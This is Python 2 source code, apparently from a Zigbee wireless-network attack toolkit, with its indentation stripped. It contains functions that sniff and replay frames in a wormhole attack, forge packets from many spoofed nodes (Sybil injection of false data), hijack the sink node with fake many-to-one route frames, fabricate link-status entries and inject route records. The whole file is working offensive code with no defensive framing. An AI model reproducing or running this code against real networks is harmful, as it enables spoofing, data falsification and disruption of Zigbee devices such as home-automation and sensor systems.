def wormhole_replay(self, data_false):
data_pkt = zbattacker.kbsniff(channel=self.opchannel,
count=1,
verbose=0,
lfilter=pkt_filter('data'))
dest = data_pkt[0]['ZigbeeNWK'].destination
src = data_pkt[0]['ZigbeeNWK'].source
if dest == self.zbaddr_src and src == self.zbaddr_dst:
data_cap = data_pkt[0]
data_cap['Dot15d4Data'].src_addr = self.zbaddr_dst
data_cap['Dot15d4Data'].dest_addr = self.zbaddr_src
#data_cap = seqnum_calc(data_cap)
data_cap["Dot15d4"].seqnum = random.randint(1, 255)
data_cap["ZigbeeNWK"].seqnum = random.randint(1, 255)
if data_false is not None:
frame_bytes = str(data_cap)
frame_len = len(frame_bytes)-22
frame_bytes = frame_bytes[0:frame_len]+data_false
new_frame = Dot15d4(frame_bytes)
zbattacker.kbsendp(pkt=new_frame,
channel=self.opchannel,
verbose=0,
count=1)
print("[->]False data injected")
return True
else:
return False
def SybilInject(*args):
chann = args[0]
short_nodes = args[1]
long_nodes = args[2]
target_node = args[3]
target_node_long = args[4]
netid = args[5]
data_to_inject = raw_input('[!!] Enter false data:')
with open('data.dat', 'rb') as filed:
rpkt = b64decode(filed.read())
rpkt = Dot15d4(rpkt)
target_node_long = struct.pack('@L', target_node_long)
addr = AddressDecoder(target_node_long)
rpkt['ZigbeeNWK'].relay_count = addr.fst1
rpkt['ZigbeeNWK'].relay_index = addr.fst2
rpkt['ZigbeeNWK'].relays[0] = addr.scd
rpkt['ZigbeeNWK'].relays[1] = addr.trd
rpkt['ZigbeeNWK'].relays[2] = addr.fth
rpkt['Dot15d4Data'].dest_panid = netid
rpkt['Dot15d4Data'].dest_addr = target_node
rpkt['ZigbeeNWK'].destination = target_node
node_count = 0
for nodes in short_nodes:
node_long = struct.pack('@L', int(long_nodes[node_count]))
addr_src = AddressDecoder(node_long)
addr_fst = int(format(addr_src.fst2, 'x') +
format(addr_src.fst1, 'x'), 16)
rpkt['ZigbeeNWK'].relays[3] = addr_fst
rpkt['ZigbeeNWK'].relays[4] = addr_src.scd
rpkt['ZigbeeNWK'].relays[5] = addr_src.trd
rpkt['ZigbeeNWK'].relays[6] = addr_src.fth
rpkt['Dot15d4Data'].src_addr = nodes
rpkt['ZigbeeNWK'].source = nodes
rpkt = seqnum_calculation(rpkt)
str_pkt = str(rpkt)
mal_pkt = Dot15d4(str_pkt[:-22]+data_to_inject)
zcapy.kbsendp(pkt=mal_pkt, channel=chann, count=1, verbose=None)
node_count += 1
print '[->] Data injected by source node: {:x}'.format(nodes)
#for i in mal_pkt['ZigbeeNWK'].relays:
# print hex(i)
time.sleep(1)
def SinkHole(sink_node, ext_sink_addr, netchannel, netid):
false_mac = random.getrandbits(64)
new_sink_addr = 0
with open("many2one.dat", "rb") as file_descriptor:
frame_bytes = b64decode(file_descriptor.read())
many2one_frame = Dot15d4(frame_bytes)
many2one_frame["Dot15d4Data"].src_addr = sink_node
many2one_frame["Dot15d4Data"].dest_panid = netid
many2one_frame["ZigbeeNWK"].seqnum = random.randint(1, 255)
many2one_frame["ZigbeeNWK"].source = sink_node
many2one_frame["ZigbeeNWK"].ext_src = false_mac
if sink_node != 0x0:
print "[->]Forcing to change sink node address"
zcapy.kbsendp(pkt=many2one_frame,
channel=netchannel,
verbose=0,
count=1)
while True:
pkt = zcapy.kbsniff(channel=netchannel,
count=1,
lfilter=pkt_filter("NWK"),
verbose=0)
if pkt[0]["ZigbeeNWK"].ext_src == ext_sink_addr:
new_sink_addr = pkt[0]["ZigbeeNWK"].source
break
elif pkt[0]["ZigbeeNWK"].ext_dst == ext_sink_addr:
new_sink_addr = pkt[0]["ZigbeeNWK"].destination
break
print "[!!]Sink node changed net address to {:x}".format(new_sink_addr)
else:
print(
"[!!]Sink node is also coordinator..."
"sending periodical m2one pkts with false MAC")
while True:
many2one_frame["ZigbeeNWK"].seqnum = random.randint(1, 255)
zcapy.kbsendp(pkt=many2one_frame,
channel=netchannel,
verbose=0,
count=1)
time.sleep(1)
def LinkStatusProcess(*args):
operative_chann = args[0]
short_nodes = args[1]
long_nodes = args[2]
target_node = args[3]
netid = args[4]
with open('lstatus.dat', 'rb') as dfile:
link_rqt = b64decode(dfile.read())
# Fabricated link status for rest entries
starting_long = 0
lnk_pkt = Dot15d4(link_rqt)
lnk_pkt['Dot15d4Data'].dest_panid = netid
for fake_node in short_nodes:
lnk_pkt.link_status_list = []
lnk_entry = LinkStatusEntry()
lnk_entry.neighbor_network_address = target_node
lnk_entry.outgoing_cost = 1
lnk_entry.incoming_cost = 1
lnk_pkt['Dot15d4Data'].src_addr = fake_node
lnk_pkt['ZigbeeNWK'].source = fake_node
lnk_pkt['ZigbeeNWK'].ext_src = long_nodes[starting_long]
lnk_pkt['ZigbeeNWKCommandPayload'].entry_count = 1
lnk_pkt['ZigbeeNWKCommandPayload'].link_status_list.append(lnk_entry)
pkt_crafted = seqnum_calculation(lnk_pkt)
#pkt_crafted.show()
zcapy.kbsendp(pkt=pkt_crafted,
channel=operative_chann,
count=1,
verbose=None)
starting_long += 1
time.sleep(1)
def route_record_injection(self, hop_count=0, hop_list=[]):
# if self.zbseqnum < 255:
# self.zbpkt["ZigbeeNWK"].seqnum += 1
# else:
# self.zbpkt["ZigbeeNWK"].seqnum = 0
# if self.dseqnum < 255:
# self.zbpkt["Dot15d4"].seqnum += 1
# else:
# self.zbpkt["Dot15d4"].seqnum = 0
self.zbpkt["ZigbeeNWK"].seqnum = random.randint(1, 255)
self.zbpkt["Dot15d4"].seqnum = random.randint(1, 255)
self.zbpkt["Dot15d4Data"].dest_addr = self.zbaddr_dst
self.zbpkt["Dot15d4Data"].src_addr = self.zbaddr_src
self.zbpkt["ZigbeeNWKCommandPayload"].rr_relay_count = hop_count
self.zbpkt["ZigbeeNWKCommandPayload"].rr_relay_list = hop_list
zbattacker.kbsendp(pkt=self.zbpkt, channel=self.opchannel, verbose=0)
if self.savepcap:
wrpcap("after_injection_pcap.pcap", self.zbpkt)
return True